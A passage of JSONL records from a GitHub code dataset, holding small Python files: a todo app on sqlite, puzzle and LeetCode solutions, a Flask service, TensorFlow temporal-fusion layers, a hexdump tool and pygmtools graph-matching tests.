(or series)\n months: num of months for the average\n exponential: whether to use EWM or simple rolling\n \"\"\"\n\n # Exponential moving average\n if exponential:\n # No negative values\n months = max(0, months)\n\n df = dfi.ewm(span=months, min_periods=0, adjust=False, ignore_na=False)\n\n # Regular moving average\n else:\n # One month at least\n months = max(1, months)\n\n df = dfi.rolling(months, min_periods=1, center=center)\n\n return df.mean().apply(lambda x: round(x, 2))\n\n\ndef smooth_serie(dfi):\n \"\"\"Smooth a serie by doing a time_average 2 times\"\"\"\n\n df = time_average(dfi, months=12, center=True)\n return time_average(df, months=6, center=True)\n\n\ndef filter_by_date(dfs_in, mdate):\n \"\"\"\n No data greater than mdate and complete missing months\n\n Args:\n dfs_in: dict with dataframes\n mdate: date of the report\n \"\"\"\n\n dfs = dfs_in.copy()\n\n # Get last date of month\n mdate = pd.to_datetime(mdate) + pd.tseries.offsets.MonthEnd(1)\n\n for name, df in dfs.items():\n\n # Filter out future data\n if df.index.name == c.COL_DATE:\n df = df[df.index <= mdate]\n\n dfs[name] = df\n\n return dfs\n","repo_name":"alveraboquet/vtasks","sub_path":"src/expensor/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"14532294024","text":"import sqlite3\n\nclass Todo():\n def __init__(self):\n self.conn = sqlite3.connect('todo.db')\n self.c = self.conn.cursor()\n self.create_task_table()\n\n def create_task_table(self):\n self.c.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS tasks (\n id INTEGER PRIMARY KEY,\n name TEXT NOT NULL,\n priority INTEGER NOT NULL\n );\n \"\"\")\n\n def add_task(self):\n name = input('Enter task name: ')\n priority = int(input(\"task priority: \"))\n print()\n if not self.find_task(name):\n self.c.execute(\"\"\"\n INSERT INTO tasks (name, priority)\n values (?,?);\n \"\"\", (name, priority))\n self.conn.commit()\n else:\n print('record already exists \\n')\n\n def show_all(self):\n for row in self.c.execute(\"\"\"SELECT * FROM tasks\"\"\"):\n print(row)\n print()\n\n # fetchall doesnt use iterator but memory issues on bog data\n # self.c.execute(\"\"\"SELECT * FROM tasks\"\"\")\n # rows = c.fetchall()\n # for row in rows:\n # print(row)\n\n # fetchone get one row per call like a generator\n # self.c.execute(\"\"\"SELECT * FROM tasks\"\"\")\n # print(self.c.fetchone())\n # print(self.c.fetchone())\n\n\n def close_conn(self):\n self.conn.close()\n\n def find_task(self, name):\n self.c.execute(\"\"\"select * from tasks\n WHERE name like ?\"\"\", (name,))\n rows = self.c.fetchall()\n return rows\n\n def find_task_by_id(self, id):\n self.c.execute(\"\"\"SELECT * FROM tasks\n WHERE id = ?\"\"\", (id,))\n return True if len(self.c.fetchall()) ==1 else False\n\n def show_task_by_name(self):\n name = input(\"task name to find: \")\n print()\n for row in self.c.execute(\"\"\"select * from tasks\n WHERE name like ?\"\"\", (name,)):\n print(row)\n print()\n\n def update_priority_by_id(self):\n id_to_update = int(input(\"task id to be updated: \"))\n updated_priority = int(input(\"new priority level? \"))\n if self.find_task_by_id(id_to_update):\n self.c.execute(\"\"\"\n UPDATE tasks\n SET priority = ?\n WHERE id = ?\"\"\", (updated_priority, id_to_update))\n self.conn.commit()\n\n def delete_task(self):\n id_to_delete = int(input(\"recode id to delete: \"))\n if self.find_task_by_id(id_to_delete):\n self.c.execute(\"\"\"\n DELETE FROM tasks\n WHERE id = ?\"\"\", (id_to_delete, ))\n self.conn.commit()\n\n\n\n\n\n# tasks = [\n# ('My second task', 5),\n# ('My third task', 10),\n# ('My forth task', 11),\n# ]\n#\n# c.executemany(\"\"\"\n# INSERT INTO tasks (name, priority)\n# values (?,?);\n# \"\"\", tasks)\n#\n# conn.commit()\n\napp = Todo()\n\nwhile True:\n try:\n choice = int(input(\"\"\"1 - Show Tasks \\\n \\n2 - Add Task \\\n \\n3 - Change Priority \\\n \\n4 - Delete Task \\\n \\n5 - Exit\\n\n \"\"\"))\n except:\n print('please select from options above by number')\n continue\n if choice not in range(1,6):\n print('please select from options above by number')\n continue\n if choice == 1:\n app.show_all()\n if choice == 2:\n app.add_task()\n if choice == 3:\n app.update_priority_by_id()\n if choice == 4:\n app.delete_task()\n if choice == 5:\n app.close_conn()\n exit('Good Bye')\n","repo_name":"FWRobins/PCPP","sub_path":"SQL_lite_db/SQL_lite.py","file_name":"SQL_lite.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33856791276","text":"import argparse\n\ndef get_layers(values, height, width):\n layers = list()\n layer_length = height * width\n for row in range(0, height):\n layers.append(list())\n for col in range(0, width):\n layers[row].append(list())\n\n for index in range(0, len(values)):\n row = (index % layer_length) // width\n col = (index % layer_length) % width\n layers[row][col].append(values[index])\n\n return layers\n\ndef count_value_in_layer(layers, layer, value):\n total = 0\n for row in range(0, len(layers)):\n for col in range(0, len(layers[row])):\n if layers[row][col][layer] == value:\n total += 1\n return total\n\ndef layer_with_min_value_count(layers, value):\n min_count = len(layers) * len(layers[0])\n min_layer = 0\n for layer in range(0, len(layers[0][0])):\n count = count_value_in_layer(layers, layer, value)\n if count < min_count:\n min_count = count\n min_layer = layer\n\n return min_layer\n\ndef get_pixel_value(layers, row, col):\n for pixel in layers[row][col]:\n if pixel == 0:\n return 0\n if pixel == 1:\n return 1\n\ndef get_image(layers):\n image = list()\n for row in range(0, len(layers)):\n image.append(list())\n for col in range(0, len(layers[row])):\n image[row].append(get_pixel_value(layers, row, col))\n\n return image\n\ndef print_image(image):\n for row in range(0, len(image)):\n for col in range(0, len(image[row])):\n if image[row][col] == 1:\n print('#', end='')\n else:\n print(' ', end='')\n print('')\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filename', default='../input/sample.txt')\n parser.add_argument('-p', '--part', choices=[1, 2], default=1, type=int)\n parser.add_argument('-he', '--height', type=int)\n parser.add_argument('-w', '--width', type=int)\n args = parser.parse_args()\n\n values = list()\n with open(args.filename, 'r') as file:\n values.extend([int(x) for x in file.readline()])\n\n layers = get_layers(values, args.height, args.width)\n if args.part == 1:\n checksum_layer = layer_with_min_value_count(layers, 0)\n print(count_value_in_layer(layers, checksum_layer, 1) * count_value_in_layer(layers, checksum_layer, 2))\n elif args.part == 2:\n print_image(get_image(layers))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ganon11/AdventCode","sub_path":"2019/Day8/src/Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40541656414","text":"# Maximum Number of Vowels in a Substring of Given Length\n\n'''\nGiven a string s and an integer k, \nreturn the maximum number of vowel letters \nin any substring of s with length k.\n\nVowel letters in English are 'a', 'e', 'i', 'o', and 'u'.\n\n\nExample 1:\n\nInput: s = \"abciiidef\", k = 3\nOutput: 3\nExplanation: The substring \"iii\" contains 3 vowel letters.\n\n\nExample 2:\n\nInput: s = \"aeiou\", k = 2\nOutput: 2\nExplanation: Any substring of length 2 contains 2 vowels.\n\n\nExample 3:\n\nInput: s = \"leetcode\", k = 3\nOutput: 2\nExplanation: \"lee\", \"eet\" and \"ode\" contain 2 vowels.\n\n'''\n# --------------sol1--------TLE\n# find the substring of length k\n# which has maximum number of vowels\n\n#initialize curvowels = 0\n# first find vowels for first k set of elements\n# initialize the variable max_vowels = curvowels\n\n# start the sliding window loop\n# for each window add one new item , remove one old item\n# calculate curvowels\n# compare and update max_vowel with curvowels\n# finally return max_vowels\n\ndef maxVowelsSubstring(str,k):\n cur_vowels = 0\n # str_list = list(str)\n temp_str = []\n for i in range(0,k):\n temp_str.append(str[i])\n if(str[i] in 'aeiou'):\n cur_vowels+=1\n \n max_vowels = cur_vowels\n for i in range(k,len(str)):\n cur_vowels = 0\n temp_str.append(str[i])\n temp_str.pop(0)\n for j in temp_str:\n if j in 'aeiou':\n cur_vowels += 1\n \n if cur_vowels>max_vowels:\n max_vowels=cur_vowels\n \n return max_vowels\n\nprint(maxVowelsSubstring(\"abciiidef\",3)) #3\nprint(maxVowelsSubstring(\"aeiou\",2)) #2\nprint(maxVowelsSubstring(\"leetcode\",3)) #2 \n\n\nprint('-----------------') \n\n# ----------------sol2-------------O(n)----------------\n# we are given a string s and a length k\n# we have to find all the substrings of length k \n# among all these substrings which has the maximum number of vowels\n# we have to return that count\n# we need to use sliding window here\n\n# s = \"abciiidef\", k = 3\n\ndef max_vowels_substring(s,k):\n cur_vowels = 0\n \n for i in range(0,k):\n if s[i] in 'aeiou':\n cur_vowels +=1\n max_vowels = cur_vowels\n \n for i in range(k,len(s)):\n # cur_vowels = 0\n if s[i] in 'aeiou':\n cur_vowels+=1\n if s[i-k] in 'aeiou':\n cur_vowels-=1\n \n max_vowels=max(max_vowels,cur_vowels)\n \n return max_vowels\n\nprint(max_vowels_substring(\"abciiidef\",3)) #3\nprint(max_vowels_substring(\"aeiou\",2)) #2\nprint(max_vowels_substring(\"leetcode\",3)) #2 ","repo_name":"Rahul-Bisht-123/Leetcode-75","sub_path":"problem15.py","file_name":"problem15.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42535592079","text":"from sqlalchemy import Column, Integer, String, Boolean, ForeignKey\nfrom sqlalchemy.orm import relationship\nfrom base import Base\nfrom Tutor.TutorModel import Tutor\nfrom Tutee.TuteeModel import Tutee\n\n\nclass Problem(Base):\n __tablename__ = \"Problem\"\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column('title', String(60))\n description = Column('description', String(255))\n course_tag = Column('course_tag', String(50))\n status = Column(\"status\", Boolean)\n # tutee_id = Column(\"tutee_id\", Integer)\n # tutor_id = Column(\"tutor_id\", Integer)\n tutor_id = Column(Integer, ForeignKey(\n Tutor.id, ondelete='CASCADE'))\n tutee_id = Column(Integer, ForeignKey(\n Tutee.id, ondelete='CASCADE'))\n\n def __init__(self, title, description, course_tag, status, tutee_id):\n self.title = title\n self.description = description\n self.course_tag = course_tag\n self.status = status\n self.tutee_id = tutee_id\n","repo_name":"tutor-match00/tutor-match","sub_path":"src/Problem/ProblemModel.py","file_name":"ProblemModel.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70662160893","text":"from . import (\n Flask, \n current_app, \n ProductAuthorSchema, \n HTTPStatus, \n AuthorModel, \n AuthorsProducts, \n ProductModel,\n AuthorSchema\n)\nfrom flask import Blueprint, request, current_app, jsonify\nfrom http import HTTPStatus\n\nclass AuthorServices:\n \"\"\"\n Descrição de alto serviçes\n \"\"\"\n def __init__(self, session):\n self.session = session\n\n def get_all_authors(self):\n authors = AuthorModel.query.all()\n\n author_list = AuthorSchema(many=True).dump(authors) \n\n return {'authors': author_list}, HTTPStatus.OK \n\n\n\n\n def post_create_author(self, request):\n\n body = request.get_json()\n name = body.get('name')\n birthplace = body.get('birthplace')\n\n new_author = AuthorModel(name=name, birthplace=birthplace)\n\n self.session.add(new_author)\n try:\n self.session.commit()\n\n except Exception as exception:\n return AuthorSchema().author_exists(), HTTPStatus.NO_CONTENT\n \n return AuthorSchema().dump(new_author), HTTPStatus.OK \n\n def get_authors_by_id_service(self, authors_id):\n found_author = AuthorModel.query.get(authors_id)\n\n if found_author:\n response = AuthorSchema().dump(found_author), HTTPStatus.OK \n else:\n response = AuthorSchema().author_not_found(), HTTPStatus.UNPROCESSABLE_ENTITY \n\n return response\n\n\n def delete_author(self, product_id):\n session = current_app.db.session\n\n try:\n\n found_author = AuthorModel.query.get(product_id)\n\n session.delete(found_author)\n session.commit()\n\n return {}, HTTPStatus.NO_CONTENT\n\n except Exception:\n\n return AuthorSchema().author_not_deleted(), HTTPStatus.NOT_FOUND \n","repo_name":"diegopires1992/digitabook-Flask","sub_path":"app/services/authors_services.py","file_name":"authors_services.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4340935750","text":"# Page 65 Algo book\n# ReverseString\n# Implement a function reverseString(str) that, given a string, will return the string of the same length but\n# with characters reversed. Example: given \"creature\" , return \"erutaerc\" . Do not use the built-in\n# reverse() function!\ndef reverseStr(str):\n newStr = \"\"\n for i in reversed(str):\n newStr += i\n return newStr\nprint(reverseStr(\"trinh\"))\n","repo_name":"trinhgliedt/Algo_Practice","sub_path":"2020_11_19_reverse_string.py","file_name":"2020_11_19_reverse_string.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19798345561","text":"#5.7Hanoi.py\ncount = 0\ndef hanoi(n,src,dst,mid):#n为盘子数量,a为起始柱,b为中间柱,c为结束柱子\n global count\n if n == 1:\n print(\"{}:{}->{}\".format(1,src,dst))\n count += 1\n else:\n hanoi(n-1,src,mid,dst)\n print(\"{}:{}->{}\".format(n,src,dst))\n count += 1\n hanoi(n-1,mid,dst,src)\nhanoi(3,\"A\",\"B\",\"C\")\nprint(count)\n","repo_name":"viviensnow23/PythonLanguageProgramming_SongTian","sub_path":"5.7Hanoi.py","file_name":"5.7Hanoi.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72078825211","text":"import typing\n\nimport tensorflow as tf\n\nK = tf.keras.backend\n\ndef linear_layer(size: int,\n activation: str = None,\n use_time_distributed:bool = False,\n use_bias:bool = True) -> tf.keras.Model:\n '''Returns simple Keras linear layer.\n\n Args:\n size: Output size\n activation: Activation function to apply if required\n use_time_distributed: Whether to apply layer across time\n use_bias: Whether bias should be included in layer\n '''\n linear = tf.keras.layers.Dense(size, activation=activation, use_bias=use_bias)\n if use_time_distributed:\n linear = tf.keras.layers.TimeDistributed(linear)\n return linear\n\ndef apply_mlp(input: tf.Tensor,\n hidden_size: int,\n output_size: int,\n hidden_activation: str = 'tanh',\n output_activation: str = None,\n use_time_distributed: bool = False) -> tf.Tensor:\n '''Applies simple feed-forward network to an input.\n\n Args:\n input: MLP input\n hidden_size: Hidden state size\n output_size: Output size of MLP\n hidden_activation: Activation function to apply on input\n output_activation: Activation function to apply on output\n use_time_distributed: Whether to apply across time\n '''\n hidden_dense = tf.keras.layers.Dense(hidden_size, activation=hidden_activation)\n output_dense = tf.keras.layers.Dense(output_size, activation=output_activation)\n if use_time_distributed:\n hidden = tf.keras.layers.TimeDistributed(hidden_dense)(input)\n return tf.keras.layers.TimeDistributed(output_dense)(hidden)\n else:\n hidden = hidden_dense(input)\n return output_dense(hidden)\n\ndef apply_gating_layer(input: tf.Tensor,\n hidden_layer_size: int,\n dropout_rate: float = None,\n use_time_distributed: bool = True,\n activation: str = None) -> typing.Tuple[tf.Tensor, tf.Tensor]:\n '''Applies a Gated Linear Unit (GLU) to an input.\n\n Args:\n input: Input to gating layer\n hidden_layer_size: Dimension of GLU\n dropout_rate: Dropout rate to apply if any\n use_time_distributed: Whether to apply across time\n activation: Activation function to apply to the linear feature if necessary\n\n Return:\n Tuple of tensors for : (GLU output, gated_layer output)\n '''\n if dropout_rate is not None:\n input = tf.keras.layers.Dropout(dropout_rate)(input)\n\n activation_dense = tf.keras.layers.Dense(hidden_layer_size, activation=activation)\n gating_dense = tf.keras.layers.Dense(hidden_layer_size, activation='sigmoid')\n\n if use_time_distributed:\n activated_output = tf.keras.layers.TimeDistributed(activation_dense)(input)\n gated_output = tf.keras.layers.TimeDistributed(gating_dense)(input)\n else:\n activated_output = activation_dense(input)\n gated_output = tf.keras.layers.TimeDistributed(input)\n\n return tf.keras.layers.Multiply()([activated_output, gated_output]), gated_output\n\ndef apply_add_and_norm(inputs: typing.List[tf.Tensor]) -> tf.Tensor:\n '''Applies skip connection followed by layer normalization.\n\n Args:\n inputs: List of input to sum for skip connection\n \n Returns:\n Tensor output from layer.\n '''\n x = tf.keras.layers.Add()(inputs)\n return tf.keras.layers.LayerNormalization()(x)\n\ndef apply_gated_residual_network(input: tf.Tensor,\n hidden_layer_size: int,\n output_size: int = None,\n dropout_rate: float = None,\n use_time_distributed : bool = True,\n additional_context: tf.Tensor = None\n ) -> typing.Tuple[tf.Tensor, tf.Tensor]:\n '''Applies the gated residual network (GRN) as defined in paper.\n\n Args:\n input: Network input\n hidden_layer_size: Internal state size\n output_size: Size of output layer\n dropout_rat: Dropout rat if dropout is applied\n use_time_distributed: Whether to apply network across time dimension\n additional_context: Additional context vector to use if relevant\n \n Returns:\n Tuple of tensors for : (GRN output, GLU output)\n '''\n\n # Setup skip connection\n if output_size is None:\n output_size = hidden_layer_size\n skip = input\n else:\n linear = tf.keras.layers.Dense(output_size)\n if use_time_distributed:\n linear = tf.keras.layers.TimeDistributed(linear)\n skip = linear(input)\n \n\n # Apply feedforward network\n hidden = linear_layer(hidden_layer_size,\n activation=None,\n use_time_distributed=use_time_distributed\n )(input)\n if additional_context is not None:\n hidden = hidden + linear_layer(\n hidden_layer_size,\n activation=None,\n use_time_distributed=use_time_distributed\n )(additional_context)\n\n hidden = tf.keras.layers.Activation('elu')(hidden)\n hidden = linear_layer(\n hidden_layer_size,\n activation=None,\n use_time_distributed=use_time_distributed\n )(hidden)\n\n glu_output, gated_output = apply_gating_layer(\n hidden,\n output_size,\n dropout_rate=dropout_rate,\n use_time_distributed=use_time_distributed,\n activation=None)\n\n return apply_add_and_norm([skip, glu_output]), gated_output\n\ndef get_decoder_mask(self_attn_input: tf.Tensor) -> tf.Tensor:\n '''Returns causal mask to apply self-attention layer.\n\n Args:\n self_attn_input: Input to self attention layer to determine mask shape\n '''\n len_s = tf.shape(self_attn_input)[1]\n bs = tf.shape(self_attn_input)[:1]\n mask = K.cumsum(tf.eye(len_s, batch_shape=bs), 1)\n\n return mask\n\nclass ScaledDotProductAttention(object):\n '''Defines scaled dot product attention layer.\n\n Attributes:\n dropout: Dropout rate to use\n activation: Normalization function for scaled dot product attention\n (e.g. softmax by default)\n '''\n def __init__(self, attn_dropout=0.0):\n self.dropout = tf.keras.layers.Dropout(attn_dropout)\n self.activation = tf.keras.layers.Activation('softmax')\n\n def __call__(self,\n q: tf.Tensor,\n k: tf.Tensor,\n v: tf.Tensor, \n mask: tf.Tensor\n ) -> typing.Tuple[tf.Tensor, tf.Tensor]:\n '''Applies scaled dot product attention.\n\n Args:\n q: Queries\n k: Keys\n v: Values\n mask: Masking if required -- sets softmax to very large value\n\n Returns:\n Tuple of (layer outputs, attention weieghts)\n '''\n temper = tf.sqrt(tf.cast(tf.shape(k)[-1], tf.float32))\n attn = tf.keras.layers.Lambda(\n lambda x: K.batch_dot(x[0], x[1], axes=[2, 2]) / temper\n )([q, k])\n\n if mask is not None:\n mmask = tf.keras.layers.Lambda(\n lambda x: (-1e+9) * (1. - K.cast(x, 'float32'))\n )(mask)\n attn = tf.keras.layers.Add()([attn, mmask])\n attn = self.activation(attn)\n attn = self.dropout(attn)\n output = tf.keras.layers.Lambda(\n lambda x: K.batch_dot(x[0], x[1])\n )([attn, v])\n\n return output, attn\n\n\n\nif __name__ == '__main__':\n input = tf.keras.layers.Input((50, 3))\n x = apply_gated_residual_network(input, 30, 2)\n print(x)","repo_name":"palpalky/training-tensorflow","sub_path":"tft/libs/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4011499449","text":"#! /usr/bin/python3\ntry:\n # inpath = (\"ascii.txt\")\n inpath=input(\"Enter relative file path or absalute file path of input:\")\n outpath=input(\"Enter relative file path or absalute file path for output:\")\n\n if not outpath: outpath=(inpath+\"_Hexdump.txt\")\n infile = open(inpath,\"rb\")\n outfile = open(outpath,\"x\")\n\n bidump = infile.read()\n hexdump = bidump.hex()\n\n hc, off, pric, hexs, hexg, chag, chadump = 0, 0, 0, 0, \"\", \"\", \"\"\n\n while hc<=len(hexdump)+32:\n\n if not hexdump[hc:hc+2]:\n hexp, cha = \" \", \"\"\n else:\n hexp=str(hexdump[hc:hc+2])\n if 32<=int(hexp,16)<=126: cha=chr(int(hexp,16))\n else: cha=chr(46)\n\n hexg, chag, hexs, pric, hc = hexg+hexp, chag+cha, hexs+1, pric+1, hc+2\n\n if hexs==2:\n hexg, hexs = hexg+\" \", 0\n\n if pric==16:\n print(\"{:07x}\".format(off)+\"0:\\t\"+hexg+\"\\t\"+chag)\n outfile.write(\"{:07x}\".format(off)+\"0:\\t\"+hexg+\"\\t\"+chag+\"\\n\")\n pric, hexg, chag, off = 0, \"\", \"\", off+1\n\n infile.close()\n outfile.close()\n\nexcept FileNotFoundError:\n print(\"usage : program_name [infile] [outfile]\")\n # print(\"No such file or directory! \")","repo_name":"rushan-mike/NPD","sub_path":"A2/hex.py","file_name":"hex.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25350575563","text":"import sys\n\nimport random\n\nsys.path.insert(0, '.')\n\nimport numpy as np\nimport torch\nimport functools\nimport itertools\nfrom tqdm import tqdm\n\nfrom test_utils import *\nimport platform\n\nos_name = platform.system()\nbackends = ['pytorch', 'numpy', 'paddle', 'jittor'] if os_name == 'Linux' else ['pytorch', 'numpy', 'paddle']\nif os_name == 'Linux':\n import jittor as jt\n\n\n# The testing function\ndef _test_mgm_solver_on_isomorphic_graphs(num_graph, num_node, node_feat_dim, solver_func, mode, matrix_params, backends):\n if mode == 'lawler-qap':\n assert 'edge_aff_fn' in matrix_params\n assert 'node_aff_fn' in matrix_params\n if backends[0] != 'pytorch':\n backends.insert(0, 'pytorch') # force pytorch as the reference backend\n\n # Generate isomorphic graphs\n pygm.BACKEND = 'pytorch'\n # As, Fs are for kb-qap algorithms\n torch.manual_seed(1)\n As, X_gt, Fs = pygm.utils.generate_isomorphic_graphs(num_node, num_graph, node_feat_dim)\n # As_1, As_2, Fs_1, Fs_2 are for lawler-qap algorithms\n As_1, As_2, Fs_1, Fs_2 = [], [], [], []\n for i in range(num_graph):\n for j in range(num_graph):\n As_1.append(As[i])\n As_2.append(As[j])\n Fs_1.append(Fs[i])\n Fs_2.append(Fs[j])\n As_1 = torch.stack(As_1, dim=0)\n As_2 = torch.stack(As_2, dim=0)\n Fs_1 = torch.stack(Fs_1, dim=0)\n Fs_2 = torch.stack(Fs_2, dim=0)\n\n As, Fs, As_1, As_2, Fs_1, Fs_2, X_gt = data_to_numpy(As, Fs, As_1, As_2, Fs_1, Fs_2, X_gt)\n\n # call the solver\n total = 1\n for val in matrix_params.values():\n total *= len(val)\n for values in tqdm(itertools.product(*matrix_params.values()), total=total):\n aff_param_dict = {} # for affinity functions (supported keys: 'node_aff_fn', 'edge_aff_fn')\n solver_param_dict = {} # for solvers\n for k, v in zip(matrix_params.keys(), values):\n if k in ['node_aff_fn', 'edge_aff_fn']:\n aff_param_dict[k] = v\n else:\n if k == 'x0' and v is not None:\n # (1-matrix_params['x0']) matchings are correct, the others are randomly permuted\n x0_prob = v\n x0 = []\n for i, j in itertools.product(range(num_graph), repeat=2):\n if i == j or random.random() > v:\n x0.append(X_gt[i, j])\n else:\n _rand_perm = np.zeros((num_node, num_node), dtype=np.float32)\n _rand_perm[np.arange(num_node), np.random.permutation(num_node)] = 1\n x0.append(_rand_perm)\n x0 = np.stack(x0)\n v = x0.reshape((num_graph, num_graph, num_node, num_node))\n solver_param_dict[k] = v\n\n last_K = None\n last_X = None\n for working_backend in backends:\n pygm.BACKEND = working_backend\n if 'x0' in solver_param_dict and solver_param_dict['x0'] is not None:\n solver_param_dict['x0'] = pygm.utils.from_numpy(solver_param_dict['x0'])\n if 'ns' in solver_param_dict and solver_param_dict['ns'] is not None:\n solver_param_dict['ns'] = pygm.utils.from_numpy(solver_param_dict['ns'])\n if mode == 'lawler-qap':\n _As_1, _As_2, _Fs_1, _Fs_2, _X_gt = data_from_numpy(As_1, As_2, Fs_1, Fs_2, X_gt)\n _conn1, _edge1, _ne1 = pygm.utils.dense_to_sparse(_As_1)\n _conn2, _edge2, _ne2 = pygm.utils.dense_to_sparse(_As_2)\n\n _K = pygm.utils.build_aff_mat(_Fs_1, _edge1, _conn1, _Fs_2, _edge2, _conn2, None, _ne1, None, _ne2,\n **aff_param_dict)\n _K = _K.reshape((num_graph, num_graph, num_node ** 2, num_node ** 2))\n if last_K is not None:\n assert np.abs(pygm.utils.to_numpy(_K) - last_K).sum() < 0.1, \\\n f\"Incorrect affinity matrix for {working_backend}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n last_K = pygm.utils.to_numpy(_K)\n _X = solver_func(_K, **solver_param_dict)\n if last_X is not None:\n assert np.abs(pygm.utils.to_numpy(_X) - last_X).sum() < 1e-4, \\\n f\"Incorrect GM solution for {working_backend}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n last_X = pygm.utils.to_numpy(_X)\n\n accuracy = (pygm.utils.to_numpy(_X) * X_gt).sum() / X_gt.sum()\n if 'x0' not in solver_param_dict or solver_param_dict['x0'] is None:\n assert accuracy == 1, f\"GM is inaccurate for {working_backend}, accuracy={accuracy}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n else:\n assert accuracy >= 1 - x0_prob, f\"GM is inaccurate for {working_backend}, accuracy={accuracy}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n elif mode == 'kb-qap':\n Fs1 = np.expand_dims(Fs, 1).repeat(num_graph, axis=1).reshape(num_graph ** 2, num_node, node_feat_dim)\n Fs2 = np.expand_dims(Fs, 0).repeat(num_graph, axis=0).reshape(num_graph ** 2, num_node, node_feat_dim)\n _As, _Fs1, _Fs2, _X_gt = data_from_numpy(As, Fs1, Fs2, X_gt)\n node_aff_mat = aff_param_dict['node_aff_fn'](_Fs1, _Fs2)\n node_aff_mat = node_aff_mat.reshape((num_graph, num_graph, num_node, num_node))\n _X = solver_func(_As, node_aff_mat, **solver_param_dict)\n\n if last_X is not None:\n diff = 0\n for i, j in itertools.product(range(num_graph), repeat=2):\n diff += np.abs(pygm.utils.to_numpy(_X[i, j]) - last_X[i, j]).sum()\n # solve again\n if diff > 1e-4:\n _X = solver_func(_As, node_aff_mat, **solver_param_dict)\n diff = 0\n for i, j in itertools.product(range(num_graph), repeat=2):\n diff += np.abs(pygm.utils.to_numpy(_X[i, j]) - last_X[i, j]).sum()\n assert diff < 1e-4, \\\n f\"Incorrect GM solution for {working_backend}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n last_X = pygm.utils.to_numpy(_X)\n\n matched = 0\n total = 0\n for i, j in itertools.product(range(num_graph), repeat=2):\n if 'ns' in solver_param_dict and solver_param_dict['ns'] is not None:\n nsi = pygm.utils.to_numpy(solver_param_dict['ns'][i]).item()\n nsj = pygm.utils.to_numpy(solver_param_dict['ns'][j]).item()\n matched += (pygm.utils.to_numpy(_X[i, j]) * X_gt[i, j, :nsi, :nsj]).sum()\n total += X_gt[i, j, :nsi, :nsj].sum()\n else:\n matched += (pygm.utils.to_numpy(_X[i, j]) * X_gt[i, j]).sum()\n total += X_gt[i, j].sum()\n accuracy = matched / total\n assert accuracy == 1, f\"GM is inaccurate for {working_backend}, accuracy={accuracy}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n else:\n raise ValueError(f'Unknown mode: {mode}')\n if 'x0' in solver_param_dict and solver_param_dict['x0'] is not None:\n solver_param_dict['x0'] = pygm.utils.to_numpy(solver_param_dict['x0'])\n if 'ns' in solver_param_dict and solver_param_dict['ns'] is not None:\n solver_param_dict['ns'] = pygm.utils.to_numpy(solver_param_dict['ns'])\n\n\ndef test_cao():\n num_nodes = 5\n num_graphs = 10\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.cao, 'lawler-qap', {\n 'mode': ['time', 'memory'],\n 'x0': [None, 0.2, 0.5],\n 'lambda_init': [0.1, 0.3],\n 'qap_solver': [functools.partial(pygm.ipfp, n1max=num_nodes, n2max=num_nodes), None],\n 'edge_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=1.), pygm.utils.inner_prod_aff_fn],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1), pygm.utils.inner_prod_aff_fn]\n }, backends)\n\n\ndef test_mgm_floyd():\n num_nodes = 5\n num_graphs = 10\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.mgm_floyd, 'lawler-qap', {\n 'mode': ['time', 'memory'],\n 'x0': [None, 0.2, 0.5],\n 'param_lambda': [0.1, 0.3],\n 'qap_solver': [functools.partial(pygm.ipfp, n1max=num_nodes, n2max=num_nodes), None],\n 'edge_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=1.), pygm.utils.inner_prod_aff_fn],\n 'node_aff_fn': 